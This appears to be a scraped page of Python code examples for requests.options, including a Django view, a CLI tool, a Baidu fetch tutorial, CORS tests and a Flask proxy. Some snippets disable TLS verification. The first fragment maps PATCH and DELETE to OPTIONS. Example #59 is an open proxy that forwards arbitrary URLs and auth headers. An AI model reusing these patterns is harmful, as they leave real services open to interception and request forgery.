    'OPTIONS': lambda url, params, data, headers: requests.options(url, headers=headers),
    'PATCH': lambda url, params, data, headers: requests.options(url, data=json.dumps(data), headers=headers),
    'DELETE': lambda url, params, data, headers: requests.options(url, headers=headers)
}


class API(object):
    """
    Generic API class which can be inherited to create an api integration
    by merely defining the 'URI' and 'ENDPOINTS'

    eg -

    URI = 'http://www.google.com/'
    AUTH_TOKEN = "TEST_TOKEN"
    ENDPOINTS = {
        'FETCH_PRODUCT_DETAILS': {
            'endpoint': 'api/v1/product/{}/',
Example #53
0
def board(request, codename):
    """
    Company board page.
    Same permissions as the company home page.

    """
    # Check the user is active
    if not request.user.get_profile().status == UserProfile.VERIFIED:
        raise PermissionDenied

    organization = get_object_or_404(Organization, codename=codename)
    context = {}

    # Load the Company Profile for the user's Active Space
    space = request.user.get_profile().space
    context['space'] = space
    company = CompanyProfile.objects.get(space=space,
                                         organization=organization)
    context['company'] = company
    context['staff'] = organization.members.all()

    context['BING_MAPS_KEY'] = settings.BING_MAPS_KEY

    # check the user is a member of the space this organization belongs to
    if not request.user in space.members:
        raise PermissionDenied

    # Authentication is Token-based
    headers = {
        'referer': settings.API_HOST,
        'content-type': 'application/json',
        # use the logged-in user authorization token
        'authorization': 'Token {}'.format(request.user.get_profile().token)
    }

    # Make an OPTIONS request to retrieve the full list of Notices for this user
    cookies = {
        'csrftoken': request.COOKIES['csrftoken'],
        'sessionid': request.COOKIES['sessionid']
    }
    url = "https://{}/api/notices".format(request.META['HTTP_HOST'])
    r = requests.options(url, verify=False, cookies=cookies)
    try:
        context['notices'] = json.dumps(
            json.loads(r.text)['results']['notices'])
    except:
        context['notices'] = '{}'

    # Load company Notices
    params = {'company': organization.codename}
    response = requests.get(url, verify=False, headers=headers, params=params)
    context['data'] = response.text

    # Add statistics
    context['stats'] = {
        'members': organization.members.all(),
        'notices': json.loads(response.text),
        'expertise': organization.expertise.all(),
    }

    # load template
    t = loader.get_template('nirit/company_profile_board.html')
    c = RequestContext(request, context)
    return HttpResponse(t.render(c))
Example #54
0
import os
import ast
import argparse
import json
import dbm
import urllib
import requests


config_file = os.path.join(os.getenv("HOME"), '.pyapi')
methods = {
    'post' : lambda url, data: requests.post(url, data=data),
    'get' : lambda url, data : requests.get(url, params=data),
    'put' : lambda url, data : requests.put(url, data=data),
    'delete' : lambda url, data : requests.delete(url, data=data),
    'options' : lambda url, data : requests.options(url, data=data)
}


def dump_config():
    """
    prints out the saved configuration
    """
    print "open db file %s for reading" % config_file
    #config_db = dbm.open(config_file, 'c')
    #config_db.close()
    #with dbm.open(config_file, 'c') as db:
    db = dbm.open(config_file, 'c')
    for key in db.keys():
        print "%s : %s" % (key.decode(), db[key].decode())
    db.close()
Example #55
0
import requests
# 启用get 请求
r = requests.get("https://www.baidu.com")
print(r.status_code)
print(type(r.text))
print(r.text)
print(r.cookies)
"""
输出:
200
<class 'str'>
<!DOCTYPE html>
<!--STATUS OK--><html> <head><meta http-equiv=content-type content=text/html;charset=utf-8><meta http-equiv=X-UA-Compatible content=IE=Edge><meta content=always name=referrer><link rel=stylesheet type=text/css href=https://ss1.bdstatic.com/5eN1bjq8AAUYm2zgoY3K/r/www/cache/bdorz/baidu.min.css><title>百度一下,你就知道</title></head> <body link=#0000cc> <div id=wrapper> <div id=head> <div class=head_wrapper> <div class=s_form> <div class=s_form_wrapper> <div id=lg> <img hidefocus=true src=//www.baidu.com/img/bd_logo1.png width=270 height=129> </div> <form id=form name=f action=//www.baidu.com/s class=fm> <input type=hidden name=bdorz_come value=1> <input type=hidden name=ie value=utf-8> <input type=hidden name=f value=8> <input type=hidden name=rsv_bp value=1> <input type=hidden name=rsv_idx value=1> <input type=hidden name=tn value=baidu><span class="bg s_ipt_wr"><input id=kw name=wd class=s_ipt value maxlength=255 autocomplete=off autofocus=autofocus></span><span class="bg s_btn_wr"><input type=submit id=su value=百度一下 class="bg s_btn" autofocus></span> </form> </div> </div> <div id=u1> <a href=http://news.baidu.com name=tj_trnews class=mnav>新闻</a> <a href=https://www.hao123.com name=tj_trhao123 class=mnav>hao123</a> <a href=http://map.baidu.com name=tj_trmap class=mnav>地图</a> <a href=http://v.baidu.com name=tj_trvideo class=mnav>视频</a> <a href=http://tieba.baidu.com name=tj_trtieba class=mnav>贴吧</a> <noscript> <a href=http://www.baidu.com/bdorz/login.gif?login&amp;tpl=mn&amp;u=http%3A%2F%2Fwww.baidu.com%2f%3fbdorz_come%3d1 name=tj_login class=lb>登录</a> </noscript> <script>document.write('<a href="http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u='+ encodeURIComponent(window.location.href+ (window.location.search === "" ? "?" : "&")+ "bdorz_come=1")+ '" name="tj_login" class="lb">登录</a>');
                </script> <a href=//www.baidu.com/more/ name=tj_briicon class=bri style="display: block;">更多产品</a> </div> </div> </div> <div id=ftCon> <div id=ftConw> <p id=lh> <a href=http://home.baidu.com>å…
³äºŽç™¾åº¦</a> <a href=http://ir.baidu.com>About Baidu</a> </p> <p id=cp>&copy;2017&nbsp;Baidu&nbsp;<a href=http://www.baidu.com/duty/>使用百度前必
读</a>&nbsp; <a href=http://jianyi.baidu.com/ class=cp-feedback>意见反馈</a>&nbsp;京ICP证030173号&nbsp; <img src=//www.baidu.com/img/gs.gif> </p> </div> </div> </div> </body> </html>

<RequestsCookieJar[<Cookie BDORZ=27315 for .baidu.com/>]>

"""
# 类似其他请求

r = requests.post("http://httpbin.org/post")
r1 = requests.delete("http://httpbin.org/delete")
r2 = requests.head("http://httpbin.org/get")
r3 = requests.options("http://httpbin.org/get")
r4 = requests.put("http://httpbin.org/put")
    def test_rest_endpoint_attribute_options(self):
        # use basic auth for rest endpoint
        f = requests.options(self.url_base() + '/rest/data/user/1/username',
                             auth=('admin', 'sekrit'),
                             headers={
                                 'content-type': "",
                                 'Origin': "http://localhost:9001",
                             })
        print(f.status_code)
        print(f.headers)

        self.assertEqual(f.status_code, 204)
        expected = {
            'Access-Control-Allow-Origin': 'http://localhost:9001',
            'Access-Control-Allow-Headers':
            'Content-Type, Authorization, X-Requested-With, X-HTTP-Method-Override',
            'Allow': 'OPTIONS, GET, PUT, DELETE, PATCH',
            'Access-Control-Allow-Methods': 'OPTIONS, GET, PUT, DELETE, PATCH',
            'Access-Control-Allow-Credentials': 'true',
        }

        # use dict comprehension to remove fields like date,
        # content-length etc. from f.headers.
        self.assertDictEqual(
            {
                key: value
                for (key, value) in f.headers.items() if key in expected
            }, expected)

        ## test a read only property.

        f = requests.options(self.url_base() + '/rest/data/user/1/creator',
                             auth=('admin', 'sekrit'),
                             headers={
                                 'content-type': "",
                                 'Origin': "http://localhost:9001",
                             })
        print(f.status_code)
        print(f.headers)

        self.assertEqual(f.status_code, 204)
        expected1 = dict(expected)
        expected1['Allow'] = 'OPTIONS, GET'
        expected1['Access-Control-Allow-Methods'] = 'OPTIONS, GET'

        # use dict comprehension to remove fields like date,
        # content-length etc. from f.headers.
        self.assertDictEqual(
            {
                key: value
                for (key, value) in f.headers.items() if key in expected
            }, expected1)

        ## test a property that doesn't exist
        f = requests.options(self.url_base() + '/rest/data/user/1/zot',
                             auth=('admin', 'sekrit'),
                             headers={'content-type': ""})
        print(f.status_code)
        print(f.headers)

        self.assertEqual(f.status_code, 404)
Example #57
0
 def do_options(self, url):
     r = requests.options(url=url)
     r.raise_for_status()
Example #58
0
def options(res):
    req_o = requests.options(res,
                             verify=False,
                             allow_redirects=False,
                             timeout=10)
    return req_o.status_code, "OPTIONS", len(req_o.content)
Example #59
0
def index():
    qs = request.query_string

    if qs:
        try:
            qs = qs.decode('utf8')

            agent = request.headers.get('User-Agent')
            oauth = request.headers.get('Authorization')
            ctype = request.headers.get('Content-Type')

            headers = {}
            if agent is not None:
                headers['User-Agent'] = agent
            if oauth is not None:
                headers['Authorization'] = oauth

            if request.method == "POST":
                user_data = {}

                if 'application/json' in ctype:
                    user_data = request.data
                else:
                    user_data = request.form.to_dict()

                if 'multipart/form-data' in ctype:
                    user_files = request.files.to_dict()

                    r = requests.post(qs,
                                      headers=headers,
                                      data=user_data,
                                      files=user_files)
                else:
                    r = requests.post(qs, headers=headers, data=user_data)
            elif request.method == "GET":
                r = requests.get(qs, headers=headers)
            elif request.method == "OPTIONS":
                '''
        OPTIONS has recently been used before POST in some libraries
        but not all websites have an OPTIONS http method; therefore,
        we provide a request to ourself in order to return
        the correct headers with correct response code and data
        '''
                r = requests.options(request.base_url, headers=headers)

            rt = r.text
        except:
            return "nope"

        response = flask.Response(rt)
        status_code = r.status_code
        '''
    we don't really care if the requests.options above 
    returns an OK request or not, we just care about
    passing a new response with new headers, and a valid status code
    '''
        if request.method == "OPTIONS":
            status_code = 200

        response.headers['Access-Control-Allow-Origin'] = '*'
        '''
    preflight CORS policy response headers
      - Returns Allowed Methods:
          In our case, GET and POST are the only ones allowed
      - Returns Allowed Headers:
          In our case, it is the headers that the user requested to use
          so, the ones in Access-Control-Request-Headers
    '''
        response.headers['Access-Control-Allow-Methods'] = 'GET, POST, OPTIONS'
        response.headers['Access-Control-Allow-Headers'] = request.headers.get(
            'Access-Control-Request-Headers')

        return response, status_code
    else:
        print("nope")

    return render_template('index.html')
Example #60
0
 def optionrequest(self, url, payload):
     return requests.options(url,
                             headers=self.headers,
                             data=json.dumps(payload))